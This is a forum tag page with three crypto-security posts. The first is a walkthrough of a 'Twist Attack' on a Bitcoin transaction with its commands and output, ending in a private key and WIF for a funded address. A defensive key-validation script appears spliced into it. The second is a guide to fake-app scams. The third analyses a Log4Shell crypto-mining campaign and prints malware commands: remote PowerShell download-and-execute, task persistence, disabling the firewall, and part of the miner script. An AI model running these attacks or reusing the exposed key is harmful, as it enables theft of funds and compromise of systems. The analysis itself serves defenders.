
Showing results for tags 'github'.


Found: 12 results

  1. CRYPTO DEEP TECH

     In this article we implement a Twist Attack using example No. 2. In the first, theoretical part of the article we saw that, using certain points on the secp256k1 elliptic curve, we can obtain partial values of the private key and restore a Bitcoin wallet within 5-15 minutes using the “Sagemath pollard rho function: (discrete_log_rho)” and the “Chinese Remainder Theorem”.

     https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md

     According to a tweet by Paulo Barreto: https://twitter.com/pbarreto/status/825703772382908416?s=21

     The cofactor is 3^2*13^2*3319*22639

     E1: 20412485227
     E2: 3319, 22639
     E3: 109903, 12977017, 383229727
     E4: 18979
     E6: 10903, 5290657, 10833080827, 22921299619447

     prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447

     38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031

     HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5

     E1: y^2 = x^3 + 1
     E2: y^2 = x^3 + 2
     E3: y^2 = x^3 + 3
     E4: y^2 = x^3 + 4
     E6: y^2 = x^3 + 6

     https://attacksafe.ru/twist-attack-on-bitcoin

     y² = x³ + ax + b. In the Koblitz curve, y² = x³ + 0x + 7. In the Koblitz curve, 0 = x³ + 0 + 7, b' = -x^3 - ax.

     Let's move on to the experimental part:

     (Consider the Bitcoin address)

     (Now consider the critically vulnerable transactions)

     Open [TerminalGoogleColab].

     We implement the Twist Attack algorithm using our 18TwistAttack repository:

         git clone https://github.com/demining/CryptoDeepTools.git
         cd CryptoDeepTools/18TwistAttack/
         ls

     Install all the packages we need from requirements.txt:

         sudo apt install python2-minimal
         wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
         sudo python2 get-pip.py
         pip2 install -r requirements.txt

     Prepare the RawTX for the attack:

         RawTX = 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

     Save it in the file: RawTX.txt

     To carry out the attack we will use the “ATTACKSAFE SOFTWARE”: www.attacksafe.ru/software

     Access rights:

         chmod +x attacksafe

     Usage:

         ./attacksafe -help

           -version: software version
           -list: list of bitcoin attacks
           -tool: indicate the attack
           -gpu: enable gpu
           -time: work timeout
           -server: server mode
           -port: server port
           -open: open file
           -save: save file
           -search: vulnerability search
           -stop: stop at mode
           -max: maximum quantity in mode
           -min: minimum quantity per mode
           -speed: boost speed for mode
           -range: specific range
           -crack: crack mode
           -field: starting field
           -point: starting point
           -inject: injection regimen
           -decode: decoding mode

         ./attacksafe -version

         Version 5.3.2. [ATTACKSAFE SOFTWARE, © 2023]

     "ATTACKSAFE SOFTWARE" includes all the popular attacks on Bitcoin.

     Let's list all the attacks:

         ./attacksafe -list

     Select -tool: twist_attack

     To obtain certain secp256k1 points from the vulnerable ECDSA signature transaction, we added the RawTX data to a text document and saved it as the file RawTX.txt.

     Run -tool twist_attack using the “ATTACKSAFE SOFTWARE”:

         ./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt

     We ran this attack from -tool twist_attack and the result was saved to the file SecretPoints.txt.

     Now, to see the successful result, open the file SecretPoints.txt:

         cat SecretPoints.txt

     Result:

         Elliptic Curve Secret Points: Q11 (on E1); Q21, Q22 (on E2); Q31, Q32, Q33 (on E3); Q41 (on E4); Q61, Q62, Q63, Q64 (on E6)

     Now let's add the obtained secp256k1 points. To do this, open the Python script: discrete.py

     To run the Python script discrete.py, install SageMath.

     Installation command:

         sudo apt-get update
         sudo apt-get install -y python3-gmpy2
         yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath

     Check the SageMath installation with the command:

         sage -v

         SageMath version 9.0

     To solve the discrete logarithm (Pollard's rho algorithm for logarithms), run the Python script: discrete.py

     Launch command:

         sage -python3 discrete.py

     Result:

         Discrete_log_rho:
         14996641256
         1546
         19575
         31735
         9071789
         145517682
         11552
         7151
         3370711
         10797447604
         10120546250224

         PRIVATE KEY: 3160389728152122137789469305939632411648887242506549174582525524562820572318

         privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64])

     Convert the private key to HEX format. The decimal form of the private key was saved to the file: privkey.txt

     Run the Python script: privkey2hex.py

         python3 privkey2hex.py
         cat privkey2hex.txt

     Open the resulting file: privkey2hex.txt

     Private key in HEX format:

         PrivKey = 06fcb79a2eabffa519509e43b7de95bc2df15ca48fe6be29f9160bcd6ac1a49e

     Open bitaddress and check:

         ADDR: 1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx
         WIF: KwTHx3AhV8qiN6qyfG1D85TGEeUBiaMUjnQ11eVLP5NAfiVNLLmS
         HEX: 06FCB79A2EABFFA519509E43B7DE95BC2DF15CA48FE6BE29F9160BCD6AC1A49E

     https://live.blockcypher.com/btc/address/1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx/

     BALANCE: $ 902.52

     Source code ATTACKSAFE SOFTWARE
     Telegram: https://t.me/cryptodeeptech
     Video: https://youtu.be/pOviZOYItv4
     Source: https://cryptodeep.ru/twist-attack-2

     Cryptanalysis
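The post above relies on points that lie on E1 to E6 (y^2 = x^3 + b with b other than 7) instead of on secp256k1. The matching defensive check is to validate every received public key against the secp256k1 equation before it is used. This is an added example, not code from the post or from the CryptoDeepTools repository; the function names and the off-curve sample points are constructed for this illustration.

```python
"""Added example: validating SEC1-encoded secp256k1 public keys before use."""

P = 2**256 - 2**32 - 977   # secp256k1 field prime
B = 7                      # secp256k1: y^2 = x^3 + 7 (a = 0)
# Standard secp256k1 generator, used here as a known-good point.
GX = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798
GY = 0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8

# Constructed off-curve points, keyed by the b of the curve they really lie on.
OFF_CURVE_SAMPLES = {1: (0, 1), 2: (P - 1, 1), 3: (1, 2), 4: (0, 2)}


class InvalidPublicKey(ValueError):
    """Raised when an encoded key is not a valid secp256k1 point."""


def implied_b(x, y):
    """Return b' such that (x, y) satisfies y^2 = x^3 + b' over F_p."""
    return (y * y - pow(x, 3, P)) % P


def x_is_on_twist(x):
    """True if x^3 + 7 is a quadratic non-residue (Euler's criterion),
    i.e. no secp256k1 point has this x; it belongs to the quadratic twist."""
    v = (pow(x, 3, P) + B) % P
    return pow(v, (P - 1) // 2, P) == P - 1


def decompress(prefix, x):
    """Recover y for a compressed key, rejecting x values with no curve point."""
    v = (pow(x, 3, P) + B) % P
    y = pow(v, (P + 1) // 4, P)          # square-root candidate, since p % 4 == 3
    if y == 0 or (y * y) % P != v:       # candidate is not a root: x is on the twist
        raise InvalidPublicKey("x has no point on secp256k1")
    return y if (y & 1) == (prefix & 1) else P - y


def parse_public_key(data):
    """Parse a SEC1 public key and return (x, y) only if it is on secp256k1."""
    if len(data) == 33 and data[0] in (2, 3):
        x = int.from_bytes(data[1:], "big")
        if x >= P:
            raise InvalidPublicKey("x is not a field element")
        return x, decompress(data[0], x)
    if len(data) == 65 and data[0] == 4:
        x = int.from_bytes(data[1:33], "big")
        y = int.from_bytes(data[33:], "big")
        if x >= P or y >= P:
            raise InvalidPublicKey("coordinate is not a field element")
        b = implied_b(x, y)
        if b != B:
            raise InvalidPublicKey(f"point satisfies y^2 = x^3 + {b}, not y^2 = x^3 + 7")
        # secp256k1 has prime order (cofactor 1), so an on-curve point
        # needs no separate subgroup check.
        return x, y
    raise InvalidPublicKey("unsupported encoding (this also rejects the point at infinity)")


def encode_uncompressed(x, y):
    """SEC1 uncompressed encoding: 0x04 || X || Y."""
    return b"\x04" + x.to_bytes(32, "big") + y.to_bytes(32, "big")


def is_valid(data):
    """Boolean wrapper around parse_public_key."""
    try:
        parse_public_key(data)
        return True
    except InvalidPublicKey:
        return False


if __name__ == "__main__":
    print("generator accepted:", is_valid(encode_uncompressed(GX, GY)))
    for b, (x, y) in OFF_CURVE_SAMPLES.items():
        print(f"constructed point on E{b} accepted:", is_valid(encode_uncompressed(x, y)))
```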
  2. CRYPTO DEEP TECH

The rise of fake cryptocurrency apps and how to avoid them.

Scammers are using fake crypto apps to steal funds from investors. Some malicious apps find their way into official app stores. And, according to the latest fraud report, fraudsters are using fake crypto apps to steal money from unsuspecting crypto investors. It highlights that American investors have lost approximately $42.7 million to swindlers through fake apps. The schemes reportedly take advantage of heightened interest in cryptocurrencies, especially during bull market runs, to beguile crypto users.

How fake crypto app scammers lure users

Fake crypto app scammers use myriad techniques to entice investors. The following is a breakdown of some of them.

Social engineering schemes

Some fake crypto app scammer networks use social engineering strategies to entice victims. In many cases, the fraudsters befriend the victims through social platforms such as dating sites and then trick them into downloading apps that appear to be functional cryptocurrency trading apps. The scammers then convince users to transfer funds to the app. The funds are, however, “locked in” once the transfer is made, and the victims are never allowed to withdraw money. In some cases, the scammers lure victims using outlandish high-yield claims. The ruse comes to an end when the victims realize that they can’t redeem their funds.

Speaking to Cointelegraph earlier this week, Rick Holland, chief information security officer of Digital Shadows — a digital risk protection firm — underscored that social engineering remains a top strategy among crooks because it requires minimal effort. “Relying upon the tried-and-true method of social engineering is far more practical and lucrative,” he said. The cybersecurity manager added that social engineering makes it easy for scammers to target high-net-worth individuals.

Context: Bob (fake name, real person) received a text claiming to be from his exchange.
The message states that due to the recent ban on crypto in China, all users must withdraw their funds to a DeFi wallet. The text also included a link to the wallet where Bob can transfer his funds. After downloading the wallet, Bob removed all of his funds from the exchange. More than $10 million in ERC20-USDT were transferred. Little did Bob know that he had just become the victim of a phishing scam. Bob reached out to us for help recovering his funds.

Bob wasn’t the first person to contact us regarding these scams. Scams are becoming more common as interest in cryptocurrency grows. According to data from our MistTrack service, more than 60% of all reported hacks were related to fake wallets.

There are several ways to protect yourself against phishing attacks:

• Never click on any link from an unknown source, even if it appears legitimate. Scammers frequently send emails or texts containing links to a fake wallet.
• Always go to the original website rather than clicking on sponsored ads. Scammers often purchase ad space on search engines to promote their counterfeit website that often appears genuine.
• Scammers will regularly message you pretending to help. After gaining your trust, they will send you a link to download their app and transfer funds to it. They will often fabricate why you cannot withdraw funds unless you deposit additional funds into it. Many who fall victim to these scams never receive their money back.
• Scammers would often pose as support from MetaMask. They would pretend to help anyone currently having difficulties using MetaMask. After gaining their trust, they would send over a link asking the victim to input their seed phrase. MetaMask will NEVER ask for your seed phrase or private key.

This is what a fake MetaMask wallet might look like.

In-depth analysis

Our team begins to analyze and research the information provided by these victims.
According to our ongoing investigation, tens of thousands of victims had their assets stolen from these phishing scams. So far, the total amount stolen exceeds $1.3 billion. These are the only funds reported to SlowMist, and we only counted ETH, BTC, TRX, ERC20-USDT, and TRC20-USDT. The graph below depicts the number of reported cases to us during November.

One victim provided us with the Tron address of the scammer. Using MistTrack, our team was able to track down and analyze the scammer’s address. It showed an additional 14 addresses that had transferred funds to this address. We can assume that these addresses also fell victim to this phishing scam. In total, the scammer was able to walk away with over $250,000 in TRC20-USDT, which they later distributed to various Binance accounts. We followed one of these Binance accounts and discovered it had over $600,000 in TRC20-USDT. Imagine the total amount stolen if this was just one of the addresses the scammer uses.

As we investigated further into this account, we discovered more illegal activity associated with it. According to our AML (anti-money laundering) software, a BTC address associated with this account (32q…fia) was used for extortion. Through the investigation of this address, we concluded that these phishing schemes were not isolated events but rather part of a larger global scale. Furthermore, our research indicates that the scammer will frequently transfer portions of the funds to multiple exchanges and to another scammer wallet with a significant amount of transactions to confuse our analysis.

Recognizable brand names

Some fake crypto app scammers have resorted to using recognizable brand names to push fake apps because of the trust and authority that they wield. In one case highlighted in the latest crypto crime report, cybercriminals posing as YiBit employees recently hoodwinked investors out of some $5.5 million after convincing them to download a bogus YiBit crypto trading app.
Unbeknown to the investors, the actual YiBit crypto exchange firm ceased operations in 2018. Fund transfers made to the fake app were stolen.

In another case outlined in the report, phishers using the Supay brand name, which is associated with an Australian crypto company, swindled 28 investors out of millions of dollars. The ploy, which ran between Nov. 1 and Nov. 26, caused $3.7 million in losses.

Such schemes have been going on for years, but many incidences go unreported due to the lack of proper recourse channels, especially in jurisdictions that shun cryptocurrencies. Besides the U.S., investigations in other major jurisdictions such as India have in the recent past uncovered elaborate fake crypto app schemes. According to a report published by the CloudSEK cybersecurity company in June, a newly discovered fake crypto app scheme involving numerous cloned apps and domains caused Indian investors to lose at least $128 million.

Distributing fake apps through official app stores

Fake crypto app scammers sometimes use official app stores to distribute dodgy applications. Some of the apps are designed to collect user credentials that are then used to unlock crypto accounts on corresponding official platforms. Others claim to offer secure wallet solutions that can be used to store a diverse range of cryptocurrencies but pilfer funds once a deposit is made.

While platforms such as Google Play Store constantly review apps for integrity issues, it is still possible for some fake apps to slip through the cracks. One of the latest methods used by scammers to accomplish this is registering as app developers on popular mobile app stores such as the Apple App Store and Google Play Store and then uploading legitimate-looking apps.

In 2021, a fake Trezor app masquerading as a wallet created by SatoshiLabs used this strategy to get published on both Apple App Store and Google Play Store.
The app claimed to provide users with direct online access to their Trezor hardware wallets without needing to connect their Trezor dongle to a computer. Victims who downloaded the fake Trezor app were obligated to submit their wallet seed phrase to start using the service. A seed phrase is a string of words that can be used to access a cryptocurrency wallet on the blockchain. The submitted details allowed the thieves behind the fake app to loot user funds.

According to a statement provided by Apple, the fake Trezor app was published on its store through a deceptive bait-and-switch maneuver. The app developers are alleged to have initially submitted the app as a cryptography application designed to encrypt files but later on converted it to a cryptocurrency wallet app. Apple said that it was not aware of the change until users reported it.

Speaking to Cointelegraph earlier this week, Chris Kline, co-founder of Bitcoin IRA — a crypto retirement investment service — said that despite such incidents, major tech companies in the space were resolute in fighting fake crypto apps because of the potential damage to their integrity. He said: “Tech companies are always looking for better education and security for their users. The most reputable players today put security at the forefront of their roadmaps. Users need reassurance that their digital assets are safe and providers are keeping security top of mind.”

That said, the fake app problem is more prevalent in non-official app stores.

Cryptocurrency is risky enough without having to worry about scams. No matter which one you choose, you will deal with volatile values. Throw in some crooks, and the risk goes up exponentially.

Social media is a goldmine for scammers to find new victims. Now, fake crypto ads are circulating on Facebook and other platforms. The ads use images of well-known industry leaders to lure people into buying crypto that doesn’t exist.
Cybersecurity researchers recently found 40 copycat sites designed to look like legitimate crypto services. The sites advertise crypto wallet apps that are anything but legitimate. Keep reading to find out the risks and protect your finances.

Watch your wallet

Cryptocurrency wallets are physical or digital storage devices for your cryptocurrency. The wallets themselves hold public and private keys, which give you access to your crypto.

How to spot a fake crypto app

Fake cryptocurrency apps are designed to resemble legitimate apps as closely as possible. As a crypto investor, one should be able to discern between legitimate and fake apps to avoid unnecessary losses. The following is a breakdown of some of the things to look out for when trying to ascertain the authenticity of a mobile crypto application.

Evidence shows that a crook is recruiting partners to distribute these bad apps via telemarketing, social media, advertisement, SMS, third-party channels, fake websites and more.

ESET researchers also uncovered malicious wallets being distributed via legitimate Chinese websites, with articles containing links to fake wallet apps. The posts used real wallet names such as Coinbase, imToken, Bitpie, MetaMask, TokenPocket, OneKey and Trust Wallet but led to copycat websites.

A thief used another legitimate Chinese website to post an article about Beijing’s crypto ban. The author included a list of genuine crypto wallets to get around the ban, along with links to bogus websites with download links for fake apps.

Different effects on iOS and Android

The malware works differently depending on your operating system. The fake Android wallet apps target new crypto users who do not have a legitimate wallet app installed on their devices. If you already have an official wallet app, the malicious one won’t be installed due to Android security measures, which don’t let you replace an original app with one that isn’t legitimate.
The copycat websites let Android users download the malicious apps from their servers even if they tap on the “Get it on Google Play” button. Following that, the app needs to be installed manually.

When it comes to iOS, multiple versions of an app can be installed simultaneously. But due to Apple’s stricter screening process, you won’t find these malicious apps in the App Store. So if you are an Apple user, you’d have to install the malicious apps from a third-party store or click on malicious links found on places like social media.

The websites for these apps let users download apps outside the official store, using a system Apple put in place for businesses and educational institutes to install custom apps without going through the App Store. You must then manually install these apps.

Once the app is up and running, it appears to work like a legitimate crypto wallet. But it isn’t. Instead, it’s stealing the currency deposited into it.

Spelling, icons and description

The first step in ascertaining whether an app is legit is checking out the spelling and icon. Fake apps usually have a name and icon that looks similar to the legitimate one, but something is usually off. If the app or developer names are misspelled, for example, the software is most likely phony. A quick search about the app on the internet will help to confirm its legitimacy.

It is also important to consider if the app has a Google Editor’s choice badge. The badge is a distinction provided by the Google Play editorial team to recognize developers and apps with outstanding quality. Apps with this badge are unlikely to be fake.

Don’t be a victim

Follow these tips to keep crypto scammers at bay:

• Use official apps from official app stores that contain links to official websites.
• Be wary of online ads for crypto.
• Research any wallet app you’re interested in. Look for reviews and information about the company behind the app.
• Before you buy crypto, read Kim’s eBook on the subject.

Application permissions

Counterfeit apps usually request more permissions than necessary. This ensures that they glean as much data as possible from victims’ devices. As such, users should be wary of apps that require off-center permissions, such as device administrator privileges. Such authorizations could give cybercriminals unfettered access to a device and allow them to intercept sensitive data that can be used to unlock financial accounts, including crypto wallets. Intrusive app permissions can be blocked via a phone system’s privacy settings.

Fake websites

Scammers sometimes create fake cryptocurrency trading platforms or fake versions of official crypto wallets to trick unsuspecting victims. These fake websites usually have similar but slightly different domain names from the sites they attempt to mimic. They look very similar to legitimate sites, making it difficult to tell the difference. Fake crypto sites often operate in one of two ways:

• As phishing pages: All the details you enter, such as your crypto wallet’s password and recovery phrase and other financial information, end up in the scammers’ hands.
• As straightforward theft: Initially, the site may allow you to withdraw a small amount of money. As your investments seem to perform well, you might invest more money in the site. However, when you subsequently want to withdraw your money, the site either shuts down or declines the request.

Phishing scams

Crypto phishing scams often target information relating to online wallets. Scammers target crypto wallet private keys, which are required to access funds within the wallet. Their method of working is similar to other phishing attempts and related to the fake websites described above. They send an email to lure recipients to a specially created website asking them to enter private key information. Once the hackers have acquired this information, they steal the cryptocurrency in those wallets.

Pump and dump schemes

This involves a particular coin or token being hyped by fraudsters through an email blast or social media such as Twitter, Facebook, or Telegram. Not wanting to miss out, traders rush to buy the coins, driving up the price. Having succeeded in inflating the price, the scammers then sell their holdings – which causes a crash as the asset’s value sharply declines. This can happen within minutes.

Fake apps

Another common way scammers trick cryptocurrency investors is through fake apps available for download through Google Play and the Apple App Store. Although these fake apps are quickly found and removed, that doesn’t mean the apps aren’t impacting many bottom lines. Thousands of people have downloaded fake cryptocurrency apps.

Fake celebrity endorsements

Crypto scammers sometimes pose as or claim endorsements from celebrities, businesspeople, or influencers to capture the attention of potential targets. Sometimes, this involves selling phantom cryptocurrencies that don’t exist to novice investors. These scams can be sophisticated, involving glossy websites and brochures that appear to show celebrity endorsements from household names such as Elon Musk.

Giveaway scams

This is where scammers promise to match or multiply the cryptocurrency sent to them in what is known as a giveaway scam. Clever messaging from what often looks like a valid social media account can create a sense of legitimacy and spark a sense of urgency. This supposed ‘once-in-a-lifetime’ opportunity can lead people to transfer funds quickly in the hope of an instant return.

Blackmail and extortion scams

Another method scammers use is blackmail. They send emails that claim to have a record of adult websites visited by the user and threaten to expose them unless they share private keys or send cryptocurrency to the scammer.

Cloud mining scams

Cloud mining refers to companies that allow you to rent mining hardware they operate in exchange for a fixed fee and a share of the revenue you will supposedly make. In theory, this allows people to mine remotely without buying expensive mining hardware. However, many cloud mining companies are scams or, at best, ineffective – in that you end up losing money or earning less than was implied.

Fraudulent initial coin offerings (ICOs)

An initial coin offering or ICO is a way for start-up crypto companies to raise money from future users. Typically, customers are promised a discount on the new crypto coins in exchange for sending active cryptocurrencies like bitcoin or another popular cryptocurrency. Several ICOs have turned out to be fraudulent, with criminals going to elaborate lengths to deceive investors, such as renting fake offices and creating high-end marketing materials.

How to spot cryptocurrency scams

So, how to spot a crypto scam? Warning signs to look out for include:

• Promises of guaranteed returns: No financial investment can guarantee future returns because investments can go down as well as up. Any crypto offering that promises you will definitely make money is a red flag.
• A poor or non-existent whitepaper: Every cryptocurrency should have a whitepaper since this is one of the most critical aspects of an initial coin offering. The whitepaper should explain how the cryptocurrency has been designed and how it will work. If the whitepaper doesn’t make sense – or worse, doesn’t exist – then tread carefully.
• Excessive marketing: All businesses promote themselves. But one way that crypto fraudsters attract people is by investing in heavy marketing – online advertising, paid influencers, offline promotion, and so on. This is designed to reach as many people as possible in the shortest time possible – to raise money fast. If you feel that the marketing for a crypto offering seems heavy-handed or makes extravagant claims without backing them up, pause and do further research.
• Unnamed team members: With most investment businesses, it should be possible to find out who the key people behind it are. Usually, this means easy-to-find biographies of the people who run the investment plus an active presence on social media. If you can’t find out who is running a cryptocurrency, be cautious.
• Free money: Whether in cash or cryptocurrency, any investment opportunity promising free money is likely to be fake.

How to protect yourself from cryptocurrency scams

Many crypto frauds are sophisticated and convincing. Here are some steps you can take to protect yourself:

• Protect your wallet: To invest in cryptocurrency, you need a wallet with private keys. If a firm asks you to share your keys to participate in an investment opportunity, it’s highly likely to be a scam. Keep your wallet keys private.
• Keep an eye on your wallet app: The first time you transfer money, send only a small amount to confirm the legitimacy of a crypto wallet app. If you’re updating your wallet app and you notice suspicious behavior, terminate the update, and uninstall the app.
• Only invest in things you understand: If it’s not clear to you how a particular cryptocurrency works, then it’s best to pause and do further research before you decide whether to invest.
• Take your time: Scammers often use high-pressure tactics to get you to invest your money quickly – for example, by promising bonuses or discounts if you participate straightaway. Take your time and carry out your own research before investing any money.
• Be wary of social media adverts: Crypto scammers often use social media to promote their fraudulent schemes. They may use unauthorized images of celebrities or high-profile businesspeople to create a sense of legitimacy, or they may promise giveaways or free cash. Maintain a healthy skepticism when you see crypto opportunities promoted on social media and do your due diligence.
• Ignore cold calls: If someone contacts you out of the blue to sell you a crypto investment opportunity, it’s probably a scam. Never disclose personal information or transfer money to someone who contacts you in this way.
• Only download apps from official platforms: Although fake apps can end up in the Google Play Store or Apple App Store, it is safer to download apps from these platforms than elsewhere.
• Do your research: The most popular cryptocurrencies are not scams. But if you haven’t heard of a particular cryptocurrency, research it – see if there is a whitepaper you can read, find out who runs it and how it operates, and look for genuine reviews and testimonials. Look for an up-to-date and credible fake cryptocurrency list to check for scams.
• Is it too good to be true: Companies that promise guaranteed returns or to make you rich overnight are likely to be scams. If something seems too good to be true, tread carefully.

Finally, as with any investment opportunity, never invest money you can’t afford to lose. Even if you’re not being scammed, cryptocurrency is volatile and speculative, so it’s essential to understand the risks.

What to do if you fall victim to a crypto scam

Falling victim to a cryptocurrency scam can be devastating, and it’s essential to act quickly if you have made a payment or disclosed personal information. Contact your bank immediately if you have:

• Made a payment using a debit or credit card.
• Made a payment via bank transfer.
• Shared personal details about yourself.

Crypto fraudsters often sell the details they have captured to other criminals. So, it’s essential to change your usernames and passwords across the board, to prevent further damage.

If you are the victim of a social media crypto scam, you can report it to the relevant social media platform. Depending on where you live, you can report frauds to the relevant body in your jurisdiction – for example, in the US, that would be the Federal Trade Commission. Other countries have their own equivalents.

The number of downloads

The number of times that an app has been downloaded is usually an indicator of how popular it is. Apps from reputable developers typically have millions of downloads and thousands of positive reviews. Inversely, apps with just a few thousand downloads require greater scrutiny.

Confirming authenticity by contacting support

If unsure about an application, contacting support through the company’s official website could help to avoid financial losses due to fraud. Furthermore, authentic apps can be downloaded from a company’s official website.

Cryptocurrencies are underpinned by relatively new technology, so it is only natural that there are teething problems when it comes to use and adoption. Unfortunately, in recent years, black hats have targeted naïve crypto enthusiasts using fake crypto apps. While the problem is likely to persist for several years, increased scrutiny by tech companies is likely to temper the issue in the long run.

Literature:

Investigation of Cryptocurrency Wallets on iOS and Android Mobile Devices for Potential Forensic Artifacts, Angelica Montanez
https://cryptodeep.ru/doc/Montanez-Angelica_Final-Research-Paper.pdf

Summary

This type of fraudulent activity is not only prevalent at the moment, but it is also on the rise. Every day, a growing number of people fall victim to this. Users should always be cautious and suspicious of phishing scams.

GitHub
Telegram: https://t.me/cryptodeeptech
Video: https://youtu.be/EkU8YhB91MI
Source: https://cryptodeep.ru/crypto-wallet-protection

Cryptanalysis
  3. CRYPTO DEEP TECH

Background on Log4j

Alibaba Cloud Security Team publicly disclosed a critical vulnerability (CVE-2021-44228) enabling unauthenticated remote code execution against multiple versions of Apache Log4j2 (Log4Shell). Vulnerable servers can be exploited by attackers connecting via any protocol such as HTTPS and sending a specially crafted string.

Log4j crypto-mining campaign

Darktrace detected crypto-mining on multiple customer deployments which occurred as a result of exploiting this Log4j vulnerability. In each of these incidents, exploitation occurred via outbound SSL connections which appear to be requests for base64-encoded PowerShell scripts to bypass perimeter defenses and download batch (.bat) script files, and multiple executables that install crypto-mining malware. The activity had wider campaign indicators, including common hard-coded IPs, executable files, and scripts.

The attack cycle begins with what appears to be opportunistic scanning of Internet-connected devices looking for VMware Horizon servers vulnerable to the Log4j exploit. Once a vulnerable server is found, the attacker makes HTTP and SSL connections to the victim. Following successful exploitation, the server performs a callback on port 1389, retrieving a script named mad_micky.bat. This achieves the following:

• Disables Windows firewall by setting all profiles to state=off: ‘netsh advfirewall set allprofiles state off’
• Searches for existing processes that indicate other miner installs using ‘netstat -ano | findstr TCP’ to identify any process operating on ports :3333, :4444, :5555, :7777, :9000 and stop the processes running
• A new webclient is initiated to silently download wxm.exe
• Scheduled tasks are used to create persistence. The command ‘schtasks /create /F /sc minute /mo 1 /tn –‘ schedules a task and suppresses warnings; the task is to be scheduled within a minute of command and given the name, ‘BrowserUpdate’, pointing to malicious domain, ‘b.oracleservice[.]top’ and hard-coded IPs: 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080
• Registry keys are added in RunOnce for persistence: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d

In at least two cases, the mad_micky.bat script was retrieved in an HTTP connection which had the user agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). This was the first and only time this user agent was seen on these networks. It appears this user agent is used legitimately by some ASUS devices with fresh factory installs; however, as a new user agent only seen during this activity it is suspicious.

Following successful exploitation, the server performs a callback on port 1389, to retrieve script files. In this example, /xms.ps1 is a base64-encoded PowerShell script that bypasses execution policy on the host to call for ‘mad_micky.bat’:

Figure 1: Additional insight on PowerShell script xms.ps1

The snapshot details the event log for an affected server and indicates successful Log4j RCE that resulted in the mad_micky.bat file download:

Figure 2: Log data highlighting mad_micky.bat file

Additional connections were initiated to retrieve executable files and scripts. The scripts contained two IP addresses located in Korea and Ukraine. A connection was made to the Ukrainian IP to download executable file xm.exe, which activates the miner. The miner, XMRig Miner (in this case), is an open source, cross-platform mining tool available for download from multiple public locations. The next observed exe download was for ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4).

Figure 3: Additional insight regarding XMRig executable

The connection to the Korean IP involved a request for another script (/2.ps1) as well as an executable file (LogBack.exe). This script deletes running tasks associated with logging, including SCM event log filter or PowerShell event log consumer. The script also requests a file from Pastebin, which is possibly a Cobalt Strike beacon configuration file. The log deletes were conducted through scheduled tasks and WMI and included: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer.

Config file (no longer hosted):

IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’)

The second file requested from Pastebin, though no longer hosted by Pastebin, is part of a schtasks command, and so probably used to establish persistence:

schtasks /create /sc MINUTE /mo 5 /tn “\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'” /F /ru System

The executable file Logback.exe is another XMRig mining tool. A config.json file was also downloaded from the same Korean IP. After this, cmd.exe and wmic commands were used to configure the miner. These file downloads and miner configuration were followed by additional connections to Pastebin.
Figure 4: OSINT correlation of mad_micky.bat file

Process specifics — mad_micky.bat file

Install

    set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
    set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”

looking for the following utilities: powershell, find, findstr, tasklist, sc

    set “LOGFILE=%USERPROFILE%\mimu6\xmrig.log”
    if %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 & goto PORT_OK)
